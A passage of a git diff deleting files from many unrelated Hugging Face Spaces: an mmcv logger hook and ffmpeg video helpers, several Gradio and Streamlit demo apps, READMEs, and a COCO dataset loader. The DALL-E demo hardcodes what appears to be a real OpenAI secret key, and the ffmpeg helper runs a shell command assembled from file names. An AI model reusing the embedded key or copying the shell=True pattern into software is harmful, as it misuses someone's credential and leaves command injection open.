FileClient.infer_client(self.file_client_args, - self.out_dir) - # The final `self.out_dir` is the concatenation of `self.out_dir` - # and the last level directory of `runner.work_dir` - basename = osp.basename(runner.work_dir.rstrip(osp.sep)) - self.out_dir = self.file_client.join_path(self.out_dir, basename) - runner.logger.info( - (f'Text logs will be saved to {self.out_dir} by ' - f'{self.file_client.name} after the training process.')) - - self.start_iter = runner.iter - self.json_log_path = osp.join(runner.work_dir, - f'{runner.timestamp}.log.json') - if runner.meta is not None: - self._dump_log(runner.meta, runner) - - def _get_max_memory(self, runner): - device = getattr(runner.model, 'output_device', None) - mem = torch.cuda.max_memory_allocated(device=device) - mem_mb = torch.tensor([mem / (1024 * 1024)], - dtype=torch.int, - device=device) - if runner.world_size > 1: - 
dist.reduce(mem_mb, 0, op=dist.ReduceOp.MAX) - return mem_mb.item() - - def _log_info(self, log_dict, runner): - # print exp name for users to distinguish experiments - # at every ``interval_exp_name`` iterations and the end of each epoch - if runner.meta is not None and 'exp_name' in runner.meta: - if (self.every_n_iters(runner, self.interval_exp_name)) or ( - self.by_epoch and self.end_of_epoch(runner)): - exp_info = f'Exp name: {runner.meta["exp_name"]}' - runner.logger.info(exp_info) - - if log_dict['mode'] == 'train': - if isinstance(log_dict['lr'], dict): - lr_str = [] - for k, val in log_dict['lr'].items(): - lr_str.append(f'lr_{k}: {val:.3e}') - lr_str = ' '.join(lr_str) - else: - lr_str = f'lr: {log_dict["lr"]:.3e}' - - # by epoch: Epoch [4][100/1000] - # by iter: Iter [100/100000] - if self.by_epoch: - log_str = f'Epoch [{log_dict["epoch"]}]' \ - f'[{log_dict["iter"]}/{len(runner.data_loader)}]\t' - else: - log_str = f'Iter [{log_dict["iter"]}/{runner.max_iters}]\t' - log_str += f'{lr_str}, ' - - if 'time' in log_dict.keys(): - self.time_sec_tot += (log_dict['time'] * self.interval) - time_sec_avg = self.time_sec_tot / ( - runner.iter - self.start_iter + 1) - eta_sec = time_sec_avg * (runner.max_iters - runner.iter - 1) - eta_str = str(datetime.timedelta(seconds=int(eta_sec))) - log_str += f'eta: {eta_str}, ' - log_str += f'time: {log_dict["time"]:.3f}, ' \ - f'data_time: {log_dict["data_time"]:.3f}, ' - # statistic memory - if torch.cuda.is_available(): - log_str += f'memory: {log_dict["memory"]}, ' - else: - # val/test time - # here 1000 is the length of the val dataloader - # by epoch: Epoch[val] [4][1000] - # by iter: Iter[val] [1000] - if self.by_epoch: - log_str = f'Epoch({log_dict["mode"]}) ' \ - f'[{log_dict["epoch"]}][{log_dict["iter"]}]\t' - else: - log_str = f'Iter({log_dict["mode"]}) [{log_dict["iter"]}]\t' - - log_items = [] - for name, val in log_dict.items(): - # TODO: resolve this hack - # these items have been in log_str - if name in [ - 'mode', 'Epoch', 'iter', 'lr', 'time', 'data_time', - 'memory', 'epoch' - ]: - continue - if isinstance(val, float): - val = f'{val:.4f}' - log_items.append(f'{name}: {val}') - log_str += ', '.join(log_items) - - runner.logger.info(log_str) - - def _dump_log(self, log_dict, runner): - # dump log in json format - json_log = OrderedDict() - for k, v in log_dict.items(): - json_log[k] = self._round_float(v) - # only append log at last line - if runner.rank == 0: - with open(self.json_log_path, 'a+') as f: - mmcv.dump(json_log, f, file_format='json') - f.write('\n') - - def _round_float(self, items): - if isinstance(items, list): - return [self._round_float(item) for item in items] - elif isinstance(items, float): - return round(items, 5) - else: - return items - - def log(self, runner): - if 'eval_iter_num' in runner.log_buffer.output: - # this doesn't modify runner.iter and is regardless of by_epoch - cur_iter = runner.log_buffer.output.pop('eval_iter_num') - else: - cur_iter = self.get_iter(runner, inner_iter=True) - - log_dict = OrderedDict( - mode=self.get_mode(runner), - epoch=self.get_epoch(runner), - iter=cur_iter) - - # only record lr of the first param group - cur_lr = runner.current_lr() - if isinstance(cur_lr, list): - log_dict['lr'] = cur_lr[0] - else: - assert isinstance(cur_lr, dict) - log_dict['lr'] = {} - for k, lr_ in cur_lr.items(): - assert isinstance(lr_, list) - log_dict['lr'].update({k: lr_[0]}) - - if 'time' in runner.log_buffer.output: - # statistic memory - if torch.cuda.is_available(): - log_dict['memory'] 
= self._get_max_memory(runner) - - log_dict = dict(log_dict, **runner.log_buffer.output) - - self._log_info(log_dict, runner) - self._dump_log(log_dict, runner) - return log_dict - - def after_run(self, runner): - # copy or upload logs to self.out_dir - if self.out_dir is not None: - for filename in scandir(runner.work_dir, self.out_suffix, True): - local_filepath = osp.join(runner.work_dir, filename) - out_filepath = self.file_client.join_path( - self.out_dir, filename) - with open(local_filepath, 'r') as f: - self.file_client.put_text(f.read(), out_filepath) - - runner.logger.info( - (f'The file {local_filepath} has been uploaded to ' - f'{out_filepath}.')) - - if not self.keep_local: - os.remove(local_filepath) - runner.logger.info( - (f'{local_filepath} was removed due to the ' - '`self.keep_local=False`')) diff --git a/spaces/Robert001/UniControl-Demo/annotator/uniformer_base/mmcv/video/processing.py b/spaces/Robert001/UniControl-Demo/annotator/uniformer_base/mmcv/video/processing.py deleted file mode 100644 index 3d90b96e0823d5f116755e7f498d25d17017224a..0000000000000000000000000000000000000000 --- a/spaces/Robert001/UniControl-Demo/annotator/uniformer_base/mmcv/video/processing.py +++ /dev/null @@ -1,160 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -import os -import os.path as osp -import subprocess -import tempfile - -from annotator.uniformer.mmcv.utils import requires_executable - - -@requires_executable('ffmpeg') -def convert_video(in_file, - out_file, - print_cmd=False, - pre_options='', - **kwargs): - """Convert a video with ffmpeg. - - This provides a general api to ffmpeg, the executed command is:: - - `ffmpeg -y -i ` - - Options(kwargs) are mapped to ffmpeg commands with the following rules: - - - key=val: "-key val" - - key=True: "-key" - - key=False: "" - - Args: - in_file (str): Input video filename. - out_file (str): Output video filename. - pre_options (str): Options appears before "-i ". - print_cmd (bool): Whether to print the final ffmpeg command. - """ - options = [] - for k, v in kwargs.items(): - if isinstance(v, bool): - if v: - options.append(f'-{k}') - elif k == 'log_level': - assert v in [ - 'quiet', 'panic', 'fatal', 'error', 'warning', 'info', - 'verbose', 'debug', 'trace' - ] - options.append(f'-loglevel {v}') - else: - options.append(f'-{k} {v}') - cmd = f'ffmpeg -y {pre_options} -i {in_file} {" ".join(options)} ' \ - f'{out_file}' - if print_cmd: - print(cmd) - subprocess.call(cmd, shell=True) - - -@requires_executable('ffmpeg') -def resize_video(in_file, - out_file, - size=None, - ratio=None, - keep_ar=False, - log_level='info', - print_cmd=False): - """Resize a video. - - Args: - in_file (str): Input video filename. - out_file (str): Output video filename. - size (tuple): Expected size (w, h), eg, (320, 240) or (320, -1). - ratio (tuple or float): Expected resize ratio, (2, 0.5) means - (w*2, h*0.5). - keep_ar (bool): Whether to keep original aspect ratio. - log_level (str): Logging level of ffmpeg. - print_cmd (bool): Whether to print the final ffmpeg command. 
- """ - if size is None and ratio is None: - raise ValueError('expected size or ratio must be specified') - if size is not None and ratio is not None: - raise ValueError('size and ratio cannot be specified at the same time') - options = {'log_level': log_level} - if size: - if not keep_ar: - options['vf'] = f'scale={size[0]}:{size[1]}' - else: - options['vf'] = f'scale=w={size[0]}:h={size[1]}:' \ - 'force_original_aspect_ratio=decrease' - else: - if not isinstance(ratio, tuple): - ratio = (ratio, ratio) - options['vf'] = f'scale="trunc(iw*{ratio[0]}):trunc(ih*{ratio[1]})"' - convert_video(in_file, out_file, print_cmd, **options) - - -@requires_executable('ffmpeg') -def cut_video(in_file, - out_file, - start=None, - end=None, - vcodec=None, - acodec=None, - log_level='info', - print_cmd=False): - """Cut a clip from a video. - - Args: - in_file (str): Input video filename. - out_file (str): Output video filename. - start (None or float): Start time (in seconds). - end (None or float): End time (in seconds). - vcodec (None or str): Output video codec, None for unchanged. - acodec (None or str): Output audio codec, None for unchanged. - log_level (str): Logging level of ffmpeg. - print_cmd (bool): Whether to print the final ffmpeg command. - """ - options = {'log_level': log_level} - if vcodec is None: - options['vcodec'] = 'copy' - if acodec is None: - options['acodec'] = 'copy' - if start: - options['ss'] = start - else: - start = 0 - if end: - options['t'] = end - start - convert_video(in_file, out_file, print_cmd, **options) - - -@requires_executable('ffmpeg') -def concat_video(video_list, - out_file, - vcodec=None, - acodec=None, - log_level='info', - print_cmd=False): - """Concatenate multiple videos into a single one. - - Args: - video_list (list): A list of video filenames - out_file (str): Output video filename - vcodec (None or str): Output video codec, None for unchanged - acodec (None or str): Output audio codec, None for unchanged - log_level (str): Logging level of ffmpeg. - print_cmd (bool): Whether to print the final ffmpeg command. 
- """ - tmp_filehandler, tmp_filename = tempfile.mkstemp(suffix='.txt', text=True) - with open(tmp_filename, 'w') as f: - for filename in video_list: - f.write(f'file {osp.abspath(filename)}\n') - options = {'log_level': log_level} - if vcodec is None: - options['vcodec'] = 'copy' - if acodec is None: - options['acodec'] = 'copy' - convert_video( - tmp_filename, - out_file, - print_cmd, - pre_options='-f concat -safe 0', - **options) - os.close(tmp_filehandler) - os.remove(tmp_filename) diff --git a/spaces/Royir/SynGen/app.py b/spaces/Royir/SynGen/app.py deleted file mode 100644 index 6d4f6804a058b7071f600cdc01194c022019427b..0000000000000000000000000000000000000000 --- a/spaces/Royir/SynGen/app.py +++ /dev/null @@ -1,49 +0,0 @@ -import subprocess -def install_spacy_model(model_name): - try: - subprocess.check_call(["python", "-m", "spacy", "download", model_name]) - except subprocess.CalledProcessError as e: - print(f"Error occurred while installing the model: {model_name}") - print(f"Error details: {str(e)}") - -install_spacy_model("en_core_web_trf") - -import gradio as gr -import torch - -from syngen_diffusion_pipeline import SynGenDiffusionPipeline - - - - - -model_path = 'CompVis/stable-diffusion-v1-4' -device = torch.device('cuda:0') if torch.cuda.is_available() else torch.device('cpu') -pipe = SynGenDiffusionPipeline.from_pretrained(model_path).to(device) - - -def generate_fn(prompt, seed): - generator = torch.Generator(device.type).manual_seed(int(seed)) - result = pipe(prompt=prompt, generator=generator, num_inference_steps=50) - return result['images'][0] - -title = "SynGen" -description = """ -This is the demo for [SynGen](https://github.com/RoyiRa/Syntax-Guided-Generation), an image synthesis approach which first syntactically analyses the prompt to identify entities and their modifiers, and then uses a novel loss function that encourages the cross-attention maps to agree with the linguistic binding reflected by the syntax. Preprint: \"Linguistic Binding in Diffusion Models: Enhancing Attribute Correspondence through Attention Map Alignment\"(https://arxiv.org/abs/2306.08877). 
-""" - -examples = [ - ["the apple is blue and the carrot is purple", "20"], - ["a yellow flamingo and a pink sunflower", "16"], - ["a checkered bowl in a cluttered room", "77"], - ["a horned lion and a spotted monkey", "1269"] -] - -prompt_textbox = gr.Textbox(label="Prompt", placeholder="a pink sunflower and a yellow flamingo", lines=1) -seed_textbox = gr.Textbox(label="Seed", placeholder="42", lines=1) - -output = gr.Image(label="generation") -demo = gr.Interface(fn=generate_fn, inputs=[prompt_textbox, seed_textbox], outputs=output, examples=examples, - title=title, description=description, allow_flagging=False) - -demo.launch() diff --git a/spaces/Sapphire-356/Video2MC/joints_detectors/Alphapose/SPPE/src/__init__.py b/spaces/Sapphire-356/Video2MC/joints_detectors/Alphapose/SPPE/src/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/Saturdays/Cardiosight/README.md b/spaces/Saturdays/Cardiosight/README.md deleted file mode 100644 index 8ffc754740351e466e688963ba06f30be8b90617..0000000000000000000000000000000000000000 --- a/spaces/Saturdays/Cardiosight/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Cardio -emoji: 🏢 -colorFrom: blue -colorTo: blue -sdk: gradio -sdk_version: 2.9.0 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces#reference diff --git a/spaces/SeViLA/SeViLA/lavis/processors/clip_processors.py b/spaces/SeViLA/SeViLA/lavis/processors/clip_processors.py deleted file mode 100644 index 08bd066de69e01c8a90ca9f8546ab046ae08cd78..0000000000000000000000000000000000000000 --- a/spaces/SeViLA/SeViLA/lavis/processors/clip_processors.py +++ /dev/null @@ -1,92 +0,0 @@ -""" - Copyright (c) 2022, salesforce.com, inc. - All rights reserved. 
- SPDX-License-Identifier: BSD-3-Clause - For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/BSD-3-Clause -""" - -from lavis.common.registry import registry -from lavis.processors.blip_processors import BlipImageBaseProcessor -from omegaconf import OmegaConf -from torchvision import transforms -from torchvision.transforms.functional import InterpolationMode - - -def _convert_to_rgb(image): - return image.convert("RGB") - - -@registry.register_processor("clip_image_train") -class ClipImageTrainProcessor(BlipImageBaseProcessor): - def __init__( - self, image_size=224, mean=None, std=None, min_scale=0.9, max_scale=1.0 - ): - - super().__init__(mean=mean, std=std) - - self.transform = transforms.Compose( - [ - transforms.RandomResizedCrop( - image_size, - scale=(min_scale, max_scale), - interpolation=InterpolationMode.BICUBIC, - ), - _convert_to_rgb, - transforms.ToTensor(), - self.normalize, - ] - ) - - @classmethod - def from_config(cls, cfg=None): - if cfg is None: - cfg = OmegaConf.create() - - image_size = cfg.get("image_size", 224) - - mean = cfg.get("mean", None) - std = cfg.get("std", None) - - min_scale = cfg.get("min_scale", 0.9) - max_scale = cfg.get("max_scale", 1.0) - - return cls( - image_size=image_size, - mean=mean, - std=std, - min_scale=min_scale, - max_scale=max_scale, - ) - - -@registry.register_processor("clip_image_eval") -class ClipImageEvalProcessor(BlipImageBaseProcessor): - def __init__(self, image_size=224, mean=None, std=None): - - super().__init__(mean=mean, std=std) - - self.transform = transforms.Compose( - [ - transforms.Resize(image_size, interpolation=InterpolationMode.BICUBIC), - transforms.CenterCrop(image_size), - _convert_to_rgb, - transforms.ToTensor(), - self.normalize, - ] - ) - - @classmethod - def from_config(cls, cfg=None): - if cfg is None: - cfg = OmegaConf.create() - - image_size = cfg.get("image_size", 224) - - mean = cfg.get("mean", None) - std = cfg.get("std", None) - - return cls( - image_size=image_size, - mean=mean, - std=std, - ) diff --git a/spaces/Serg4451D/DALLE/app.py b/spaces/Serg4451D/DALLE/app.py deleted file mode 100644 index 3648e33adc5454e7cbe95f7ff08c4ecdb6930768..0000000000000000000000000000000000000000 --- a/spaces/Serg4451D/DALLE/app.py +++ /dev/null @@ -1,50 +0,0 @@ -import streamlit as st -import requests -from requests.structures import CaseInsensitiveDict - -import json - -query_url = "https://api.openai.com/v1/images/generations" - -st.title("DALL-E 2 API Image Generation Demo") - -st.write("Enter a prompt to generate an image") - -prompt = st.text_area("Prompt", "A cat riding a bike") - -model = st.selectbox( - "Select a DALL-E 2 model", - ["image-alpha-001", ""] -) - -num_images = st.slider("Number of images to generate", min_value=1, max_value=10, value=1) - -headers = CaseInsensitiveDict() -headers["Content-Type"] = "application/json" -api_key = "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" -headers["Authorization"] = f"Bearer {api_key}" - -data = """ -{ - """ -data += f'"model": "{model}",' -data += f'"prompt": "{prompt}",' -data += f'"num_images": {num_images}' -data += """ -} -""" - -def generate_images(): - resp = requests.post(query_url, headers=headers, data=data) - - if resp.status_code != 200: - raise ValueError("Failed to generate image "+resp.text) - - response_text = json.loads(resp.text) - return response_text['data'] - -if st.button("Generate Images"): - with st.spinner("Generating images..."): - image_data = generate_images() - for idx, image in 
enumerate(image_data): - st.image(image['url'], caption=f"Image {idx+1}", width=400) diff --git a/spaces/Shine1916/MyChat/README.md b/spaces/Shine1916/MyChat/README.md deleted file mode 100644 index 334b01a484931fdc434cf1a067662aa1d647abc9..0000000000000000000000000000000000000000 --- a/spaces/Shine1916/MyChat/README.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: 智能AI聊天系统 -emoji: 🌍 -colorFrom: blue -colorTo: yellow -sdk: gradio -sdk_version: 3.18.0 -app_file: app.py -pinned: false -python: 3.8.9 -license: apache-2.0 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference \ No newline at end of file diff --git a/spaces/ShreyaRao/SummarizeEasy/README.md b/spaces/ShreyaRao/SummarizeEasy/README.md deleted file mode 100644 index 9d6535ba74b382f1e36666246b797416124d7bb1..0000000000000000000000000000000000000000 --- a/spaces/ShreyaRao/SummarizeEasy/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: SummarizeEasy -emoji: 👀 -colorFrom: green -colorTo: blue -sdk: streamlit -sdk_version: 1.21.0 -app_file: app.py -pinned: false -license: other ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/Sibanjan/Email/app.py b/spaces/Sibanjan/Email/app.py deleted file mode 100644 index db77c19ae663858bc4a30ff33d6d0eb5a41a377d..0000000000000000000000000000000000000000 --- a/spaces/Sibanjan/Email/app.py +++ /dev/null @@ -1,56 +0,0 @@ - -import openai -import gradio as gr -import os - -open_ai_key = os.environ["open_ai_key"] - -openai.api_key = open_ai_key # Replace this with your API key: https://beta.openai.com/docs/quickstart/add-your-api-key - -def openai_chat(prompt): - completions = openai.Completion.create( - engine="text-davinci-003", - prompt=prompt, - max_tokens=1024, - n=1, - temperature=0.5, - ) - - message = completions.choices[0].text - return message.strip() - -def build_type_1(content_url, Email_Type, industry,theme, keywords,job_role,prospect_context): - return f"Write a {Email_Type} email to sell servicenow product to a prospect in {industry} based on their information extracted from {prospect_context} by analyzing and summarizing this content {content_url} around {keywords} focusing on {theme} and is relevant for job {job_role}" - -def build_type_2(content_url, Email_Type, industry,theme, keywords,job_role,prospect_context): - return f"Write a {Email_Type} email to sell servicenow product to a prospect in {industry} based on their information extracted from {prospect_context} by analyzing and summarizing this content {content_url} around {keywords} focusing on {theme} and is relevant for job {job_role}.Start with congratulating {job_role} for the new role" - -def build_prod_upgrade_yes(content_url, Email_Type, industry,theme, keywords,job_role,prospect_context): - return f"Write a {Email_Type} email to inform on new product update for servicenow to a prospect in {industry} based on their information extracted from {prospect_context} by analyzing and summarizing this content {content_url} around {keywords} focusing on {theme} and is relevant for job {job_role}.Start with congratulating {job_role} for the new role" - -def build_prod_upgrade_no(content_url, Email_Type, industry,theme, keywords,job_role,prospect_context): - return f"Write a {Email_Type} email to inform on new product update for servicenow to a prospect in {industry} based on their information extracted from {prospect_context} by analyzing and summarizing this content {content_url} around {keywords} focusing 
on {theme} and is relevant for job {job_role}." - -def call_email(Email_Type,industry,keywords, theme, content_url,job_role_change, job_role,prospect_context, history=[]): - if job_role_change=="Yes": - if Email_Type=="Product Upgrade Communication": - input_agg = build_prod_upgrade_yes(content_url,Email_Type, industry,theme, keywords, job_role,prospect_context) - else: - input_agg = build_type_2(content_url,Email_Type, industry,theme, keywords, job_role,prospect_context) - elif job_role_change=="No": - if Email_Type=="Product Upgrade Communication": - input_agg = build_prod_upgrade_no(content_url,Email_Type, industry,theme, keywords, job_role,prospect_context) - else: - input_agg = build_type_1(content_url,Email_Type, industry,theme, keywords, job_role,prospect_context) - print(input_agg) - output = openai_chat(input_agg) - history=[] - history.append((Email_Type, output)) - return history, history - -gr.Interface(fn = call_email, - inputs = [gr.Radio(["First Touch", "Persuasive", "Followup","Event Invitation","New Launch Communication", "Product Upgrade Communication"],value="First Touch"),"text","text","text","text",gr.Dropdown(["Yes", "No"],value="No"),"text",'text','state'], - outputs = ["chatbot",'state']).launch(debug = True) - - -gr.launch(share=True) \ No newline at end of file diff --git a/spaces/SlowBette/ChatBot_gpt3.5/README.md b/spaces/SlowBette/ChatBot_gpt3.5/README.md deleted file mode 100644 index 6fc21d4e19f72c39d0f26953a9b1291a8d4c1c57..0000000000000000000000000000000000000000 --- a/spaces/SlowBette/ChatBot_gpt3.5/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: ChatBot Gpt3.5 -emoji: 📉 -colorFrom: yellow -colorTo: blue -sdk: gradio -sdk_version: 3.29.0 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/Superlang/ImageProcessor/annotator/oneformer/oneformer/data/datasets/register_coco_panoptic_annos_semseg.py b/spaces/Superlang/ImageProcessor/annotator/oneformer/oneformer/data/datasets/register_coco_panoptic_annos_semseg.py deleted file mode 100644 index 170daf3ee71d9302220370d70f7c0160a4c2a235..0000000000000000000000000000000000000000 --- a/spaces/Superlang/ImageProcessor/annotator/oneformer/oneformer/data/datasets/register_coco_panoptic_annos_semseg.py +++ /dev/null @@ -1,367 +0,0 @@ -# ------------------------------------------------------------------------------ -# Reference: https://github.com/facebookresearch/Mask2Former/blob/main/mask2former/data/datasets/register_coco_panoptic_annos_semseg.py -# Modified by Jitesh Jain (https://github.com/praeclarumjj3) -# ------------------------------------------------------------------------------ - -import json -import os - -from annotator.oneformer.detectron2.data import DatasetCatalog, MetadataCatalog -from annotator.oneformer.detectron2.data.datasets import load_sem_seg -from annotator.oneformer.detectron2.data.datasets.builtin_meta import COCO_CATEGORIES -from annotator.oneformer.detectron2.utils.file_io import PathManager -import contextlib -import logging -import io -from fvcore.common.timer import Timer -import annotator.oneformer.pycocotools.mask as mask_util -from annotator.oneformer.detectron2.structures import BoxMode - - -logger = logging.getLogger(__name__) - - -_PREDEFINED_SPLITS_COCO_PANOPTIC = { - "coco_2017_train_panoptic": ( - # This is the original panoptic annotation directory - "coco/panoptic_train2017", - "coco/annotations/panoptic_train2017.json", - # This directory contains semantic 
annotations that are - # converted from panoptic annotations. - # It is used by PanopticFPN. - # You can use the script at detectron2/datasets/prepare_panoptic_fpn.py - # to create these directories. - "coco/panoptic_semseg_train2017", - ), - "coco_2017_val_panoptic": ( - "coco/panoptic_val2017", - "coco/annotations/panoptic_val2017.json", - "coco/panoptic_semseg_val2017", - ), -} - -def load_coco_instance_json(json_file, image_root, dataset_name=None): - from annotator.oneformer.pycocotools.coco import COCO - - timer = Timer() - json_file = PathManager.get_local_path(json_file) - with contextlib.redirect_stdout(io.StringIO()): - coco_api = COCO(json_file) - if timer.seconds() > 1: - logger.info("Loading {} takes {:.2f} seconds.".format(json_file, timer.seconds())) - - id_map = None - if dataset_name is not None: - meta = MetadataCatalog.get(dataset_name) - cat_ids = sorted(coco_api.getCatIds()) - cats = coco_api.loadCats(cat_ids) - # The categories in a custom json file may not be sorted. - thing_classes = [c["name"] for c in sorted(cats, key=lambda x: x["id"])] - meta.thing_classes = thing_classes - - # In COCO, certain category ids are artificially removed, - # and by convention they are always ignored. - # We deal with COCO's id issue and translate - # the category ids to contiguous ids in [0, 80). - - # It works by looking at the "categories" field in the json, therefore - # if users' own json also have incontiguous ids, we'll - # apply this mapping as well but print a warning. - if not (min(cat_ids) == 1 and max(cat_ids) == len(cat_ids)): - if "coco" not in dataset_name: - logger.warning( - """ -Category ids in annotations are not in [1, #categories]! We'll apply a mapping for you. -""" - ) - id_map = {v: i for i, v in enumerate(cat_ids)} - meta.thing_dataset_id_to_contiguous_id = id_map - - # sort indices for reproducible results - img_ids = sorted(coco_api.imgs.keys()) - # imgs is a list of dicts, each looks something like: - # {'license': 4, - # 'url': 'http://farm6.staticflickr.com/5454/9413846304_881d5e5c3b_z.jpg', - # 'file_name': 'COCO_val2014_000000001268.jpg', - # 'height': 427, - # 'width': 640, - # 'date_captured': '2013-11-17 05:57:24', - # 'id': 1268} - imgs = coco_api.loadImgs(img_ids) - # anns is a list[list[dict]], where each dict is an annotation - # record for an object. The inner list enumerates the objects in an image - # and the outer list enumerates over images. Example of anns[0]: - # [{'segmentation': [[192.81, - # 247.09, - # ... - # 219.03, - # 249.06]], - # 'area': 1035.749, - # 'iscrowd': 0, - # 'image_id': 1268, - # 'bbox': [192.81, 224.8, 74.73, 33.43], - # 'category_id': 16, - # 'id': 42986}, - # ...] - anns = [coco_api.imgToAnns[img_id] for img_id in img_ids] - total_num_valid_anns = sum([len(x) for x in anns]) - total_num_anns = len(coco_api.anns) - if total_num_valid_anns < total_num_anns: - logger.warning( - f"{json_file} contains {total_num_anns} annotations, but only " - f"{total_num_valid_anns} of them match to images in the file." - ) - - if "minival" not in json_file: - # The popular valminusminival & minival annotations for COCO2014 contain this bug. - # However the ratio of buggy annotations there is tiny and does not affect accuracy. - # Therefore we explicitly white-list them. 
- ann_ids = [ann["id"] for anns_per_image in anns for ann in anns_per_image] - assert len(set(ann_ids)) == len(ann_ids), "Annotation ids in '{}' are not unique!".format( - json_file - ) - - imgs_anns = list(zip(imgs, anns)) - logger.info("Loaded {} images in COCO format from {}".format(len(imgs_anns), json_file)) - - dataset_dicts = {} - - ann_keys = ["iscrowd", "bbox", "keypoints", "category_id"] - - num_instances_without_valid_segmentation = 0 - - for (img_dict, anno_dict_list) in imgs_anns: - record = {} - record["file_name"] = os.path.join(image_root, img_dict["file_name"]) - record["height"] = img_dict["height"] - record["width"] = img_dict["width"] - image_id = record["image_id"] = img_dict["id"] - - objs = [] - for anno in anno_dict_list: - # Check that the image_id in this annotation is the same as - # the image_id we're looking at. - # This fails only when the data parsing logic or the annotation file is buggy. - - # The original COCO valminusminival2014 & minival2014 annotation files - # actually contains bugs that, together with certain ways of using COCO API, - # can trigger this assertion. - assert anno["image_id"] == image_id - - assert anno.get("ignore", 0) == 0, '"ignore" in COCO json file is not supported.' - - obj = {key: anno[key] for key in ann_keys if key in anno} - if "bbox" in obj and len(obj["bbox"]) == 0: - raise ValueError( - f"One annotation of image {image_id} contains empty 'bbox' value! " - "This json does not have valid COCO format." - ) - - segm = anno.get("segmentation", None) - if segm: # either list[list[float]] or dict(RLE) - if isinstance(segm, dict): - if isinstance(segm["counts"], list): - # convert to compressed RLE - segm = mask_util.frPyObjects(segm, *segm["size"]) - else: - # filter out invalid polygons (< 3 points) - segm = [poly for poly in segm if len(poly) % 2 == 0 and len(poly) >= 6] - if len(segm) == 0: - num_instances_without_valid_segmentation += 1 - continue # ignore this instance - obj["segmentation"] = segm - - keypts = anno.get("keypoints", None) - if keypts: # list[int] - for idx, v in enumerate(keypts): - if idx % 3 != 2: - # COCO's segmentation coordinates are floating points in [0, H or W], - # but keypoint coordinates are integers in [0, H-1 or W-1] - # Therefore we assume the coordinates are "pixel indices" and - # add 0.5 to convert to floating point coordinates. - keypts[idx] = v + 0.5 - obj["keypoints"] = keypts - - obj["bbox_mode"] = BoxMode.XYWH_ABS - if id_map: - annotation_category_id = obj["category_id"] - try: - obj["category_id"] = id_map[annotation_category_id] - except KeyError as e: - raise KeyError( - f"Encountered category_id={annotation_category_id} " - "but this id does not exist in 'categories' of the json file." - ) from e - objs.append(obj) - record["annotations"] = objs - dataset_dicts[image_id] = record - - if num_instances_without_valid_segmentation > 0: - logger.warning( - "Filtered out {} instances without valid segmentation. ".format( - num_instances_without_valid_segmentation - ) - + "There might be issues in your dataset generation process. Please " - "check https://detectron2.readthedocs.io/en/latest/tutorials/datasets.html carefully" - ) - return dataset_dicts - -def get_metadata(): - meta = {} - # The following metadata maps contiguous id from [0, #thing categories + - # #stuff categories) to their names and colors. 
We have to replica of the - # same name and color under "thing_*" and "stuff_*" because the current - # visualization function in D2 handles thing and class classes differently - # due to some heuristic used in Panoptic FPN. We keep the same naming to - # enable reusing existing visualization functions. - thing_classes = [k["name"] for k in COCO_CATEGORIES if k["isthing"] == 1] - thing_colors = [k["color"] for k in COCO_CATEGORIES if k["isthing"] == 1] - stuff_classes = [k["name"] for k in COCO_CATEGORIES] - stuff_colors = [k["color"] for k in COCO_CATEGORIES] - - meta["thing_classes"] = thing_classes - meta["thing_colors"] = thing_colors - meta["stuff_classes"] = stuff_classes - meta["stuff_colors"] = stuff_colors - - # Convert category id for training: - # category id: like semantic segmentation, it is the class id for each - # pixel. Since there are some classes not used in evaluation, the category - # id is not always contiguous and thus we have two set of category ids: - # - original category id: category id in the original dataset, mainly - # used for evaluation. - # - contiguous category id: [0, #classes), in order to train the linear - # softmax classifier. - thing_dataset_id_to_contiguous_id = {} - stuff_dataset_id_to_contiguous_id = {} - - for i, cat in enumerate(COCO_CATEGORIES): - if cat["isthing"]: - thing_dataset_id_to_contiguous_id[cat["id"]] = i - # else: - # stuff_dataset_id_to_contiguous_id[cat["id"]] = i - - # in order to use sem_seg evaluator - stuff_dataset_id_to_contiguous_id[cat["id"]] = i - - meta["thing_dataset_id_to_contiguous_id"] = thing_dataset_id_to_contiguous_id - meta["stuff_dataset_id_to_contiguous_id"] = stuff_dataset_id_to_contiguous_id - - return meta - - -def load_coco_panoptic_json(json_file, instances_json, instances_name, image_dir, gt_dir, semseg_dir, meta): - """ - Args: - image_dir (str): path to the raw dataset. e.g., "~/coco/train2017". - gt_dir (str): path to the raw annotations. e.g., "~/coco/panoptic_train2017". - json_file (str): path to the json file. e.g., "~/coco/annotations/panoptic_train2017.json". - Returns: - list[dict]: a list of dicts in Detectron2 standard format. (See - `Using Custom Datasets `_ ) - """ - - def _convert_category_id(segment_info, meta): - if segment_info["category_id"] in meta["thing_dataset_id_to_contiguous_id"]: - segment_info["category_id"] = meta["thing_dataset_id_to_contiguous_id"][ - segment_info["category_id"] - ] - segment_info["isthing"] = True - else: - segment_info["category_id"] = meta["stuff_dataset_id_to_contiguous_id"][ - segment_info["category_id"] - ] - segment_info["isthing"] = False - return segment_info - - with PathManager.open(json_file) as f: - json_info = json.load(f) - - instance_data_dicts = load_coco_instance_json(instances_json, image_dir.replace("panoptic_", ""), instances_name) - - ret = [] - for ann in json_info["annotations"]: - image_id = int(ann["image_id"]) - # TODO: currently we assume image and label has the same filename but - # different extension, and images have extension ".jpg" for COCO. Need - # to make image extension a user-provided argument if we extend this - # function to support other COCO-like datasets. 
